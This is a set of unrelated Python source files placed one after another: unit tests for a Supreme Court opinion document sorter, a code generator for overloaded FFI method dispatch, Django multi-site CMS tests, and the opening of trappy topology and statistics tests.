the purpose of sending it into Delaware he has completed a statutory offense. \
Hence he is triable in Illinois. But to hold that the statutory crime also \
encompasses the receipt of the prohibited article in Delaware, justifying a \
trial at that point, requires an implication that I am unwilling to make in \
the absence of more explicit Congressional language.""",
"""Very often the difference between liberty and imprisonment in cases where \
the direct evidence offered by the government and the defendant is evenly \
balanced depends upon the presence of character witnesses. The defendant is \
more likely to obtain their presence in the district of his residence, which \
in this instance is usually the place where the prohibited article is mailed. \
The inconvenience, expense and loss of time involved in transplanting these \
witnesses to testify in trials far removed from their homes are often too \
great to warrant their use. Moreover, they are likely to lose much of their \
effectiveness before a distant jury that knows nothing of their reputations. \
Such factors make it difficult for me to conclude, where Congress has not \
said so specifically, that we should construe the Federal Denture Act as \
covering more than the first sufficient and punishable use of the mails \
insofar as the sender of a prohibited article is concerned. The principle of \
narrow construction of criminal statutes does not warrant interpreting the \
"use" of the mails to cover all possible uses in light of the foregoing \
considerations."""])
CASE_TITLE = """\
UNITED STATES v. JOHNSON ET AL., DOING BUSINESS AS UNITED STATES\
DENTAL CO., ET AL.\
"""
CASE_NUM = "No. 43"
CASE_US_CITE = "323 U.S. 273"
CASE_SUPREME_COURT_CITE = "65 S. Ct. 249"
CASE_LAWYERS_ED_CITE = "89 L. Ed. 236"
CASE_LEXIS_CITE = "1944 U.S. LEXIS 1230"
CASE_FULL_CITE = "323 U.S. 273; 65 S. Ct. 249; 89 L. Ed. 236; 1944 U.S. LEXIS 1230"
CASE_DATES = [("November 8, 1944", "Argued"),("December 18, 1944", "Decided")]
CASE_DISPOSITION = "53 F.Supp. 596, affirmed."
OPINION_AUTHOR = "MURPHY"
OPINION_TEXT = "\n".join(VALID_OPINION_FILE_LINES[10:])
TEST_PICKLE_PATH = os.path.join(os.path.abspath(os.curdir), "pickled_test_doc")
#######
def create_test_docs():
test_meta1 = SupremeCourtOpinionMetadata()
test_meta1.case_title = CASE_TITLE
test_meta1.case_num = CASE_NUM
test_meta1.case_us_cite = CASE_US_CITE
test_meta1.case_supreme_court_cite = CASE_SUPREME_COURT_CITE
test_meta1.case_lawyers_ed_cite = CASE_LAWYERS_ED_CITE
test_meta1.case_lexis_cite = CASE_LEXIS_CITE
test_meta1.case_full_cite = CASE_FULL_CITE
test_meta1.case_dates = CASE_DATES
test_meta1.case_disposition = CASE_DISPOSITION
test_meta1.opinion_author = OPINION_AUTHOR
test_doc1 = SupremeCourtOpinion(test_meta1, OPINION_TEXT, TEST_PICKLE_PATH)
test_meta2 = SupremeCourtOpinionMetadata()
test_meta2.case_num = "No. 43"
test_doc2 = SupremeCourtOpinion(test_meta2, OPINION_TEXT, TEST_PICKLE_PATH)
test_meta3 = SupremeCourtOpinionMetadata()
test_meta3.case_num = "No. 67"
test_meta3.opinion_author = "JOHNSON"
test_doc3 = SupremeCourtOpinion(test_meta3, OPINION_TEXT, TEST_PICKLE_PATH)
test_meta4 = SupremeCourtOpinionMetadata()
test_meta4.case_num = "No. 46"
test_meta4.opinion_author = "MURPHY"
test_doc4 = SupremeCourtOpinion(test_meta4, OPINION_TEXT, TEST_PICKLE_PATH)
test_meta5 = SupremeCourtOpinionMetadata()
test_meta5.case_num = "No. 43"
test_doc5 = SupremeCourtOpinion(test_meta5, OPINION_TEXT, TEST_PICKLE_PATH)
test_docs = [test_doc1, test_doc2, test_doc3, test_doc4, test_doc5]
return test_docs
class DocumentSorterTest(unittest.TestCase):
def setUp(self):
self.test_docs = create_test_docs()
self.test_sorter = DocumentSorter(self.test_docs)
def tearDown(self):
del self.test_sorter
del self.test_docs
def testSortDocsNormalCase(self):
# If I sort on case num, I should get one subset of 3 for "No. 43",
# a subset of 1 for "No. 46", and a subset of 1 for "No. 67"
print("DocumentSorterTest: testing DocumentSorter.sort_docs normal case.")
sorted_subsets = self.test_sorter.sort_docs("case_num")
expected_subsets = ([[self.test_docs[0],self.test_docs[1],self.test_docs[4]],
[self.test_docs[3]], [self.test_docs[2]]])
self.assertEqual(len(expected_subsets), len(sorted_subsets))
for i in range(len(expected_subsets)):
expected_subset = expected_subsets[i]
sorted_subset = sorted_subsets[i]
self.assertEqual(len(expected_subset), len(sorted_subset))
for j in range(len(expected_subsets[i])):
expected_doc = expected_subsets[i][j]
sorted_doc = sorted_subsets[i][j]
self.assertEqual(expected_doc.doc_metadata.case_num,
sorted_doc.doc_metadata.case_num)
#self.fail("DocumentSorterTest: I haven't written a test for testSortDocsNormalCase yet!")
def testSortDocsEmptyInputList(self):
# should this just return an empty list?
print("DocumentSorterTest: testing DocumentSorter.sort_docs with empty input list of docs.")
self.test_sorter.doc_list = []
sorted_subsets = self.test_sorter.sort_docs("case_num")
expected_subsets = []
self.assertEqual(expected_subsets, sorted_subsets)
#self.fail("DocumentSorterTest: I haven't written a test for testSortDocsEmptyInputList yet!")
def testSortDocsNonDocObject(self):
print("DocumentSorterTest: testing DocumentSorter.sort_docs with input "
"list of docs containing non-Document object...")
# throw exception
self.test_docs.append("THIS IS A STRING")
self.assertRaises(Exception, self.test_sorter.sort_docs, "case_num")
#self.fail("DocumentSorterTest: I haven't written a test for testSortDocsNonDocObject yet!")
def testSortDocsInvalidSortField(self):
print("DocumentSorterTest: testing DocumentSorter.sort_docs with invalid sort field...")
# throw exception
self.assertRaises(Exception, self.test_sorter.sort_docs, "this_isnt_a_field")
#self.fail("DocumentSorterTest: I haven't written a test for testSortDocsInvalidSortField yet!")
def testCreateSubsetNormalCase(self):
print("DocumentSorterTest: testing DocumentSorter.create_subset normal case...")
# If I create a subset where author is in ["JOHNSON", "MURPHY"], I
# should get a subset of 2 -- 2 MUPRHY, 1 JOHNSON
test_allowed_values = ["MURPHY", "JOHNSON"]
expected_subset = [self.test_docs[0], self.test_docs[2], self.test_docs[3]]
created_subset = self.test_sorter.create_subset("opinion_author", test_allowed_values)
self.assertEqual(expected_subset, created_subset)
#self.fail("DocumentSorterTest: I haven't written a test for testCreateSubsetNormalCase yet!")
def testCreateSubsetNoAllowedValues(self):
print ("DocumentSorterTest: testing DocumentSorter.create_subset with no "
"list of allowed values...")
# return empty subset list?
test_allowed_values = []
expected_subset = []
created_subset = self.test_sorter.create_subset("opinion_author", test_allowed_values)
self.assertEqual(expected_subset, created_subset)
#self.fail("DocumentSorterTest: I haven't written a test for testCreateSubsetNoAllowedValues yet!")
def testCreateSubsetNoAllowedValueMatches(self):
print("DocumentSorterTest: testing DocumentSorter.create_subset with no "
"matches on the allowed values...")
# return empty subset list?
test_allowed_values = ["JACKSON", "THOMPSON"]
expected_subset = []
created_subset = self.test_sorter.create_subset("opinion_author", test_allowed_values)
self.assertEqual(expected_subset, created_subset)
#self.fail("DocumentSorterTest: I haven't written a test for testCreateSubsetNoAllowedValueMatches yet!")
def testAddDocNormalCase(self):
print("DocumentSorterTest: testing DocumentSorter.add_doc normal case...")
test_meta = SupremeCourtOpinionMetadata()
test_meta.case_num = "No. 99"
test_doc = SupremeCourtOpinion(test_meta, OPINION_TEXT, TEST_PICKLE_PATH)
self.assertEqual(len(self.test_sorter.doc_list), 5)
self.test_sorter.add_doc(test_doc)
self.assertEqual(len(self.test_sorter.doc_list), 6)
self.assertEqual(self.test_sorter.doc_list[5], test_doc)
#self.fail("DocumentSorterTest: I haven't written a test for testAddDocNormalCase yet!")
def testAddDocWithNonSupremeCourtOpinion(self):
print("DocumentSorterTest: testing DocumentSorter.add_doc with non-Document...")
# throw exception, or let it happen??
# what if I simply assert that it has to have at least doc_metadata?
self.assertRaises(Exception, self.test_sorter.add_doc, "THIS IS NOT A DOC")
#self.fail("DocumentSorterTest: I haven't written a test for testAddDocWithNonDocument yet!")
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
| |
from direct.showbase.PythonUtil import *
from types import *
import string
import FFIConstants
import FFISpecs
import FFITypes
"""
Things that are not supported:
- Overloading a function based on an enum being differentiated from an int
- Type names from C++ cannot have __enum__ in their name
- Overloading static and non-static methods with the same name
"""
AT_not_atomic = 0
AT_int = 1
AT_float = 2
AT_double = 3
AT_bool = 4
AT_char = 5
AT_void = 6
AT_string = 7
AT_longlong = 8
def cullOverloadedMethods(fullMethodDict):
"""
Find all the entries that have multiple indexes for the same method name
Get rid of all others.
"""
tmpDict = {}
# For each class
for methodName in fullMethodDict.keys():
methodList = fullMethodDict[methodName]
# See if this method has more than one function index (overloaded)
if (len(methodList) > 1):
tmpDict[methodName] = methodList
# Mark all the method specifications as overloaded
for methodSpec in methodList:
methodSpec.overloaded = 1
return tmpDict
def getTypeName(classTypeDesc, typeDesc):
"""
Map the interrogate primitive type names to python type names.
We assume that the module using this has imported the types module.
It is valid to pass in None for classTypeDesc if we are not in a class
"""
typeName = typeDesc.getFullNestedName()
# Atomic C++ types are type checked against the builtin
# Python types. This code sorts out the mapping
if typeDesc.isAtomic():
# Ints, bools, and chars are treated as ints.
# Enums are special and are not atomic, see below
if ((typeDesc.atomicType == AT_int) or
(typeDesc.atomicType == AT_bool) or
(typeDesc.atomicType == AT_char)):
return 'IntType'
# Floats and doubles are both floats in Python
elif ((typeDesc.atomicType == AT_float) or
(typeDesc.atomicType == AT_double)):
return 'FloatType'
elif ((typeDesc.atomicType == AT_longlong)):
return 'LongType'
# Strings are treated as Python strings
elif ((typeDesc.atomicType == AT_string)):
return 'StringType'
elif (typeDesc.atomicType == AT_void):
# Convert the void type to None type... I guess...
# So far we do not have any code that uses this
return 'NoneType'
else:
FFIConstants.notify.error("Unknown atomicType: %s" % (typeDesc.atomicType))
# If the type is an enum, we really want to treat it like an int
# To handle this, the type will have __enum__ in the name
# Usually it will start the typeName, but some typeNames have the
# surrounding class as part of their name
# like BoundedObject.__enum__BoundingVolumeType
elif (typeName.find('__enum__') >= 0):
return 'IntType'
# If it was not atomic or enum, it must be a class which is a
# bit trickier because we output different things depending on the
# scoping of the type.
else:
# classTypeDesc typeDesc fullNestedName Resulting TypeName
# 1 Outer Other Other Other.Other
# 2 Outer Outer Outer Outer
# 3 Outer Inner Outer.Inner Outer.Inner
# 4 Inner Other Other Other.Other
# 5 Inner Outer Outer Outer
# 6 Inner Inner Outer.Inner Outer.Inner
# 7 None Other Other Other.Other
# CASES 1, 4, and 7 are the only ones that are different from the full
# nested name, returning Other.Other
returnNestedTypeNames = string.split(typeName, '.')
returnModuleName = returnNestedTypeNames[0]
if classTypeDesc:
classTypeName = classTypeDesc.getFullNestedName()
classNestedTypeNames = string.split(classTypeName, '.')
# If there is no nesting, return typeName.typeName
if ((not (classTypeDesc.foreignTypeName in returnNestedTypeNames)) and
(not (typeDesc.foreignTypeName in classNestedTypeNames))):
return (returnModuleName + '.' + typeName)
# All other cases, we just need typeName
else:
return typeName
else:
# If you had no class, you need to specify module plus typename
return (returnModuleName + '.' + typeName)
def inheritsFrom(type1, type2):
"""
Return true if type1 inherits from type2
This works by recursively checking parentTypes for type1
"""
if type1.parentTypes:
if type2 in type1.parentTypes:
return 1
else:
result = 0
for type in type1.parentTypes:
result = (result or inheritsFrom(type, type2))
return result
else:
return 0
def getInheritanceLevel(type, checkNested = 1):
if type.__class__ == FFITypes.PyObjectTypeDescriptor:
# A special case: PyObject * is always the most general
# object. Everything is a PyObject.
return -1
# If this is a nested type, return the inheritance level of the outer type.
if type.isNested:
# Check the level of your outer class
# pass the checkNested flag as 0 to prevent an infinite loop
# between the parent and child
level = getInheritanceLevel(type.outerType, 0)
else:
level = 0
for parentType in type.parentTypes:
# Add 1 because you are one level higher than your parent
level = max(level, 1+getInheritanceLevel(parentType))
if checkNested:
for nestedType in type.nestedTypes:
# Do not add 1 to your nested types
level = max(level, getInheritanceLevel(nestedType))
return level
def inheritanceLevelSort(type1, type2):
level1 = getInheritanceLevel(type1)
level2 = getInheritanceLevel(type2)
if (level1 == level2):
# If they are equal in the inheritance,
# sort them alphabetically by their type name
return cmp(type1.foreignTypeName, type2.foreignTypeName)
elif (level1 < level2):
return -1
elif (level1 > level2):
return 1
def subclass(type1, type2):
"""
Helper funcion used in sorting classes by inheritance
"""
# If the types are the same, return 0
if type1 == type2:
return 0
# If you have no args, sort you first
elif (type1 == 0):
return 1
elif (type2 == 0):
return -1
# If class1 inherits from class2 return -1
elif inheritsFrom(type1, type2):
return -1
# If class2 inherits from class1 return 1
elif inheritsFrom(type2, type1):
return 1
else:
# This is the don't care case. We must specify a sorting
# rule just so it is not arbitrary
if (type1.foreignTypeName > type2.foreignTypeName):
return -1
else:
return 1
class FFIMethodArgumentTreeCollection:
def __init__(self, classTypeDesc, methodSpecList):
self.classTypeDesc = classTypeDesc
self.methodSpecList = methodSpecList
self.methodDict = {}
self.treeDict = {}
def outputOverloadedMethodHeader(self, file, nesting):
# If one is static, we assume they all are.
# The current system does not support overloading static and non-static
# methods with the same name
# Constructors are not treated as static. They are special because
# they are not really constructors, they are instance methods that fill
# in the this pointer.
# Global functions do not need static versions
if (self.methodSpecList[0].isStatic() and
(not self.methodSpecList[0].isConstructor())):
indent(file, nesting, 'def ' +
self.methodSpecList[0].name + '(*_args):\n')
else:
indent(file, nesting, 'def ' +
self.methodSpecList[0].name + '(self, *_args):\n')
self.methodSpecList[0].outputCFunctionComment(file, nesting+2)
indent(file, nesting+2, 'numArgs = len(_args)\n')
def outputOverloadedMethodFooter(self, file, nesting):
# If this is a static method, we need to output a static version
# If one is static, we assume they all are.
# The current system does not support overloading static and non-static
# methods with the same name
# Constructors are not treated as static. They are special because
# they are not really constructors, they are instance methods that fill
# in the this pointer.
methodName = self.methodSpecList[0].name
if (self.methodSpecList[0].isStatic() and
(not self.methodSpecList[0].isConstructor()) and
(not isinstance(self.methodSpecList[0], FFISpecs.GlobalFunctionSpecification))):
self.outputOverloadedStaticFooter(file, nesting)
else:
if self.classTypeDesc:
indent(file, nesting, "FFIExternalObject.funcToMethod("+methodName+','+ self.classTypeDesc.foreignTypeName+ ",'"+methodName+"')\n")
indent(file, nesting, 'del '+methodName+'\n')
indent(file, nesting, ' \n')
indent(file, nesting+1, '\n')
def outputOverloadedStaticFooter(self, file, nesting):
# foo = staticmethod(foo)
methodName = self.methodSpecList[0].name
indent(file, nesting, self.classTypeDesc.foreignTypeName + '.' + methodName + ' = staticmethod(' + methodName + ')\n')
indent(file, nesting,'del ' +methodName+' \n\n')
def setup(self):
for method in self.methodSpecList:
numArgs = len(method.typeDescriptor.thislessArgTypes())
numArgsList = self.methodDict.setdefault(numArgs, [])
numArgsList.append(method)
for numArgs in self.methodDict.keys():
methodList = self.methodDict[numArgs]
tree = FFIMethodArgumentTree(self.classTypeDesc, methodList)
treeList = self.treeDict.setdefault(numArgs, [])
treeList.append(tree)
def generateCode(self, file, nesting):
self.setup()
self.outputOverloadedMethodHeader(file, nesting)
numArgsKeys = self.treeDict.keys()
numArgsKeys.sort()
for i in range(len(numArgsKeys)):
numArgs = numArgsKeys[i]
trees = self.treeDict[numArgs]
for tree in trees:
# If this is the first case, output an if clause
if (i == 0):
indent(file, nesting+2, 'if (numArgs == ' + repr(numArgs) + '):\n')
# If this is a subsequent first case, output an elif clause
else:
indent(file, nesting+2, 'elif (numArgs == ' + repr(numArgs) + '):\n')
tree.setup()
tree.traverse(file, nesting+1, 0)
# If the overloaded function got all the way through the if statements
# it must have had the wrong number or type of arguments
indent(file, nesting+2, "else:\n")
indent(file, nesting+3, "raise TypeError, 'Invalid number of arguments: ' + repr(numArgs) + ', expected one of: ")
for numArgs in numArgsKeys:
indent(file, 0, (repr(numArgs) + ' '))
indent(file, 0, "'\n")
self.outputOverloadedMethodFooter(file, nesting)
class FFIMethodArgumentTree:
"""
Tree is made from nested dictionaries.
The keys are methodNamed.
The values are [tree, methodSpec]
methodSpec may be None at any level
If tree is None, it is a leaf node and methodSpec will be defined
"""
def __init__(self, classTypeDesc, methodSpecList):
self.argSpec = None
self.classTypeDesc = classTypeDesc
self.methodSpecList = methodSpecList
# The actual tree is implemented as nested dictionaries
self.tree = {}
def setup(self):
for methodSpec in self.methodSpecList:
argTypes = methodSpec.typeDescriptor.thislessArgTypes()
self.fillInArgTypes(argTypes, methodSpec)
def fillInArgTypes(self, argTypes, methodSpec):
# If the method takes no arguments, we will assign a type index of 0
if (len(argTypes) == 0):
self.tree[0] = [
FFIMethodArgumentTree(self.classTypeDesc,
self.methodSpecList),
methodSpec]
else:
self.argSpec = argTypes[0]
typeDesc = self.argSpec.typeDescriptor.recursiveTypeDescriptor()
if (len(argTypes) == 1):
# If this is the last parameter, we are a leaf node, so store the
# methodSpec in this dictionary
self.tree[typeDesc] = [None, methodSpec]
else:
if typeDesc in self.tree:
# If there already is a tree here, jump into and pass the
# cdr of the arg list
subTree = self.tree[typeDesc][0]
subTree.fillInArgTypes(argTypes[1:], methodSpec)
else:
# Add a subtree for the rest of the arg list
subTree = FFIMethodArgumentTree(self.classTypeDesc,
self.methodSpecList)
subTree.fillInArgTypes(argTypes[1:], methodSpec)
# This subtree has no method spec
self.tree[typeDesc] = [subTree, None]
def traverse(self, file, nesting, level):
oneTreeHasArgs = 0
typeNameList = []
# First see if this tree branches at all. If it does not there are
# drastic optimizations we can take because we can simply call the
# bottom-most function. We are not checking the types of all the
# arguments for the sake of type checking, we are simply trying to
# figure out which overloaded function to call. If there is only
# one overloaded function with this number of arguements at this
# level, it must be the one. No need to continue checking all the
# arguments.
branches = 0
subTree = self
prevTree = subTree
levelCopy = level
while subTree:
if (len(subTree.tree.keys()) == 0):
# Dead end branch
break
if (len(subTree.tree.keys()) > 1):
# Ok, we branch, it was worth a try though
branches = 1
break
prevTree = subTree
# Must only have one subtree, traverse it
subTree = subTree.tree.values()[0][0]
levelCopy += 1
# If there were no branches, this is easy
# Just output the function and return
# Note this operates on prevTree because subTree went one too far
if not branches:
methodSpec = prevTree.tree.values()[0][1]
indent(file, nesting+2, 'return ')
methodSpec.outputOverloadedCall(file, prevTree.classTypeDesc, levelCopy)
return
# Ok, We must have a branch down here somewhere
# Make a copy of the keys so we can sort them in place
sortedKeys = self.tree.keys()
# Sort the keys based on inheritance hierarchy, most specific classes first
sortedKeys.sort(subclass)
for i in range(len(sortedKeys)):
typeDesc = sortedKeys[i]
# See if this takes no arguments
if (typeDesc == 0):
# Output the function
methodSpec = self.tree[0][1]
indent(file, nesting+2, 'return ')
methodSpec.outputOverloadedCall(file, self.classTypeDesc, 0)
else:
# This is handled at the top of the file now (?)
# Import a file if we need to for this typeDesc
# if ((typeDesc != 0) and
# (not typeDesc.isNested) and
# # Do not put our own module in the import list
# (self.classTypeDesc != typeDesc) and
# # If this is a class (not a primitive), put it on the list
# (typeDesc.__class__ == FFITypes.ClassTypeDescriptor)):
# indent(file, nesting+2, 'import ' + typeDesc.foreignTypeName + '\n')
# Specify that at least one of these trees had arguments
# so we know to output an else clause
oneTreeHasArgs = 1
typeName = getTypeName(self.classTypeDesc, typeDesc)
typeNameList.append(typeName)
if typeDesc.__class__ == FFITypes.PyObjectTypeDescriptor:
# A special case: if one of the parameters is
# PyObject *, that means anything is accepted.
condition = '1'
else:
# Otherwise, we'll check the particular type of
# the object.
condition = '(isinstance(_args[' + repr(level) + '], ' + typeName + '))'
# Legal types for a float parameter include int and long.
if (typeName == 'FloatType'):
condition += (' or (isinstance(_args[' + repr(level) + '], IntType))')
condition += (' or (isinstance(_args[' + repr(level) + '], LongType))')
# Legal types for a long parameter include int.
elif (typeName == 'LongType'):
condition += (' or (isinstance(_args[' + repr(level) + '], IntType))')
# Legal types for an int parameter include long.
elif (typeName == 'IntType'):
condition += (' or (isinstance(_args[' + repr(level) + '], LongType))')
indent(file, nesting+2, 'if ' + condition + ':\n')
if (self.tree[typeDesc][0] is not None):
self.tree[typeDesc][0].traverse(file, nesting+1, level+1)
else:
methodSpec = self.tree[typeDesc][1]
indent(file, nesting+3, 'return ')
numArgs = level+1
methodSpec.outputOverloadedCall(file, self.classTypeDesc, numArgs)
# Output an else clause if one of the trees had arguments
if oneTreeHasArgs:
indent(file, nesting+2, "raise TypeError, 'Invalid argument " + repr(level) + ", expected one of: ")
for name in typeNameList:
indent(file, 0, ('<' + name + '> '))
indent(file, 0, "'\n")
def isSinglePath(self):
if (len(self.tree.keys()) > 1):
# More than one child, return false
return 0
else:
# Only have one child, see if he only has one child
key = self.tree.keys()[0]
tree = self.tree[key][0]
if tree:
return tree.isSinglePath()
else:
return self.tree[key][1]
| |
# -*- coding: utf-8 -*-
from datetime import timedelta
from django.contrib.sites.models import Site
from django.conf import settings
from django.urls import reverse
from model_mommy import mommy
from coop_cms.models import BaseArticle, ArticleCategory
from coop_cms.settings import get_article_class
from coop_cms.tests import BaseArticleTest, BaseTestCase, BeautifulSoup
class MultiSiteTest(BaseTestCase):
def tearDown(self):
super(MultiSiteTest, self).tearDown()
site1 = Site.objects.all()[0]
settings.SITE_ID = site1.id
def test_view_article(self):
site1 = Site.objects.all()[0]
site2 = Site.objects.create(domain='hhtp://test2', name="Test2")
settings.SITE_ID = site1.id
article = get_article_class().objects.create(title="test", publication=BaseArticle.PUBLISHED)
response = self.client.get(article.get_absolute_url())
self.assertEqual(200, response.status_code)
def test_view_article_on_site2(self):
site1 = Site.objects.all()[0]
site2 = Site.objects.create(domain='hhtp://test2', name="Test2")
settings.SITE_ID = site2.id
article = get_article_class().objects.create(title="test", publication=BaseArticle.PUBLISHED)
response = self.client.get(article.get_absolute_url())
self.assertEqual(200, response.status_code)
def test_view_article_on_all_sites(self):
site1 = Site.objects.all()[0]
site2 = Site.objects.create(domain='hhtp://test2', name="Test2")
settings.SITE_ID = site1.id
article = get_article_class().objects.create(title="test", publication=BaseArticle.PUBLISHED)
article.sites.add(site2)
article.save()
response = self.client.get(article.get_absolute_url())
self.assertEqual(200, response.status_code)
settings.SITE_ID = site2.id
response = self.client.get(article.get_absolute_url())
self.assertEqual(200, response.status_code)
def test_view_404_site2(self):
site1 = Site.objects.all()[0]
site2 = Site.objects.create(domain='hhtp://test2', name="Test2")
settings.SITE_ID = site1.id
article = get_article_class().objects.create(title="test", publication=BaseArticle.PUBLISHED)
settings.SITE_ID = site2.id
response = self.client.get(article.get_absolute_url())
self.assertEqual(404, response.status_code)
def test_view_only_site2(self):
site1 = Site.objects.all()[0]
site2 = Site.objects.create(domain='hhtp://test2', name="Test2")
settings.SITE_ID = site1.id
article = get_article_class().objects.create(title="test", publication=BaseArticle.PUBLISHED)
article.sites.remove(site1)
article.sites.add(site2)
article.save()
settings.SITE_ID = site1.id
response = self.client.get(article.get_absolute_url())
self.assertEqual(404, response.status_code)
settings.SITE_ID = site2.id
response = self.client.get(article.get_absolute_url())
self.assertEqual(200, response.status_code)
class MultiSiteCategoryTest(BaseArticleTest):
def setUp(self):
self.settings_site_id = settings.SITE_ID
settings.SITE_ID = 1
def tearDown(self):
settings.SITE_ID = self.settings_site_id
def test_article_category_other_site(self):
article_class = get_article_class()
site1 = Site.objects.get(id=settings.SITE_ID)
site2 = mommy.make(Site)
cat = mommy.make(ArticleCategory)
art1 = mommy.make(article_class, slug="test1", category=cat, publication=BaseArticle.PUBLISHED)
art2 = mommy.make(
article_class, slug="test2", category=cat, publication=BaseArticle.PUBLISHED,
publication_date=art1.publication_date+timedelta(1))
art2.sites.add(site2)
art2.sites.remove(site1)
art2.save()
art3 = mommy.make(article_class, slug="test3", category=cat, publication=BaseArticle.PUBLISHED,
publication_date=art1.publication_date-timedelta(1))
art3.sites.add(site2)
art3.sites.remove(site1)
art3.save()
self.assertEqual(art1.previous_in_category(), None)
self.assertEqual(art1.next_in_category(), None)
def test_article_category_same_site(self):
article_class = get_article_class()
site1 = Site.objects.get(id=settings.SITE_ID)
site2 = mommy.make(Site)
cat = mommy.make(ArticleCategory)
art1 = mommy.make(article_class, slug="test1", category=cat, publication=BaseArticle.PUBLISHED)
art2 = mommy.make(article_class, slug="test2", category=cat, publication=BaseArticle.PUBLISHED,
publication_date=art1.publication_date+timedelta(1))
art3 = mommy.make(article_class, slug="test3", category=cat, publication=BaseArticle.PUBLISHED,
publication_date=art1.publication_date-timedelta(1))
art3.sites.add(site2)
art3.save()
self.assertEqual(art1.previous_in_category(), art3)
self.assertEqual(art1.next_in_category(), art2)
def test_article_category_not_published(self):
article_class = get_article_class()
site1 = Site.objects.get(id=settings.SITE_ID)
site2 = mommy.make(Site)
cat = mommy.make(ArticleCategory)
art1 = mommy.make(article_class, slug="test1", category=cat, publication=BaseArticle.PUBLISHED)
art2 = mommy.make(article_class, slug="test2", category=cat, publication=BaseArticle.DRAFT,
publication_date=art1.publication_date+timedelta(1))
art3 = mommy.make(article_class, slug="test3", category=cat, publication=BaseArticle.DRAFT,
publication_date=art1.publication_date-timedelta(1))
art3.sites.add(site2)
art3.save()
self.assertEqual(art1.previous_in_category(), None)
self.assertEqual(art1.next_in_category(), None)
def test_article_category(self):
self._log_as_editor()
article_class = get_article_class()
site1 = Site.objects.get(id=settings.SITE_ID)
site2 = mommy.make(Site)
cat = mommy.make(ArticleCategory)
self.assertEqual(list(cat.sites.all()), [site1])
cat2 = mommy.make(ArticleCategory)
cat2.sites.remove(site1)
cat2.sites.add(site2)
cat2.save()
self.assertEqual(list(cat2.sites.all()), [site2])
cat3 = mommy.make(ArticleCategory)
cat3.sites.remove(site1)
cat3.save()
self.assertEqual(list(cat3.sites.all()), [])
art1 = mommy.make(article_class, slug="test", category=cat, publication=BaseArticle.PUBLISHED)
url = reverse('coop_cms_article_settings', args=[art1.id])
response = self.client.get(url)
self.assertEqual(200, response.status_code)
soup = BeautifulSoup(response.content)
cat_choices = soup.select("select#id_category option")
self.assertEqual(2, len(cat_choices))
self.assertEqual("", cat_choices[0]["value"])
self.assertEqual(str(cat.id), cat_choices[1]["value"])
self.assertEqual(cat.name, cat_choices[1].text)
def test_view_category_articles(self):
cat = mommy.make(ArticleCategory, name="abc")
article_class = get_article_class()
site1 = Site.objects.get(id=settings.SITE_ID)
site2 = mommy.make(Site)
cat = mommy.make(ArticleCategory)
self.assertEqual(list(cat.sites.all()), [site1])
cat.sites.add(site2)
cat.save()
art1 = mommy.make(article_class, category=cat, publication=True, title="#THis is crazy")
art2 = mommy.make(article_class, category=cat, publication=True, title="#Call me maybe")
art2.sites.remove(site1)
art2.save()
url = reverse('coop_cms_articles_category', args=[cat.slug])
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertContains(response, art1.title)
self.assertNotContains(response, art2.title)
def test_view_category_of_other_site(self):
cat = mommy.make(ArticleCategory, name="abc")
article_class = get_article_class()
site1 = Site.objects.get(id=settings.SITE_ID)
site2 = mommy.make(Site)
cat = mommy.make(ArticleCategory)
self.assertEqual(list(cat.sites.all()), [site1])
cat2 = mommy.make(ArticleCategory)
cat2.sites.remove(site1)
cat2.sites.add(site2)
cat2.save()
art1 = mommy.make(article_class, slug="test1", category=cat, publication=True)
art2 = mommy.make(article_class, slug="test2", category=cat2, publication=True)
url = reverse('coop_cms_articles_category', args=[cat2.slug])
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
| |
# Copyright 2015-2016 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
from trappy.stats.Topology import Topology
from trappy.stats.Trigger import Trigger
from trappy.stats.Aggregator import MultiTriggerAggregator
import collections
import trappy
from trappy.base import Base
import pandas as pd
from pandas.util.testing import assert_series_equal
class TestTopology(unittest.TestCase):
def test_add_to_level(self):
"""Test level creation"""
level_groups = [[1, 2], [0, 3, 4, 5]]
level = "test_level"
topology = Topology()
topology.add_to_level(level, level_groups)
check_groups = topology.get_level(level)
self.assertTrue(topology.has_level(level))
self.assertEqual(level_groups, check_groups)
def test_flatten(self):
"""Test Topology: flatten"""
level_groups = [[1, 2], [0, 3, 4, 5]]
level = "test_level"
topology = Topology()
topology.add_to_level(level, level_groups)
flattened = [0, 1, 2, 3, 4, 5]
self.assertEqual(flattened, topology.flatten())
def test_cpu_topology_construction(self):
"""Test CPU Topology Construction"""
cluster_0 = [0, 3, 4, 5]
cluster_1 = [1, 2]
clusters = [cluster_0, cluster_1]
topology = Topology(clusters=clusters)
# Check cluster level creation
cluster_groups = [[0, 3, 4, 5], [1, 2]]
self.assertTrue(topology.has_level("cluster"))
self.assertEqual(cluster_groups, topology.get_level("cluster"))
# Check cpu level creation
cpu_groups = [[0], [1], [2], [3], [4], [5]]
self.assertTrue(topology.has_level("cpu"))
self.assertEqual(cpu_groups, topology.get_level("cpu"))
# Check "all" level
all_groups = [[0, 1, 2, 3, 4, 5]]
self.assertEqual(all_groups, topology.get_level("all"))
def test_level_span(self):
"""TestTopology: level_span"""
level_groups = [[1, 2], [0, 3, 4, 5]]
level = "test_level"
topology = Topology()
topology.add_to_level(level, level_groups)
self.assertEqual(topology.level_span(level), 2)
def test_group_index(self):
"""TestTopology: get_index"""
level_groups = [[1, 2], [0, 3, 4, 5]]
level = "test_level"
topology = Topology()
topology.add_to_level(level, level_groups)
self.assertEqual(topology.get_index(level, [1, 2]), 0)
self.assertEqual(topology.get_index(level, [0, 3, 4, 5]), 1)
class BaseTestStats(unittest.TestCase):
def setUp(self):
trace = trappy.BareTrace()
data = {
"identifier": [
0,
0,
0,
1,
1,
1,
],
"result": [
"fire",
"blank",
"fire",
"blank",
"fire",
"blank",
],
}
index = pd.Series([0.1, 0.2, 0.3, 0.4, 0.5, 0.6], name="Time")
data_frame = pd.DataFrame(data, index=index)
trace.add_parsed_event("aim_and_fire", data_frame)
self._trace = trace
self.topology = Topology(clusters=[[0], [1]])
class TestTrigger(BaseTestStats):
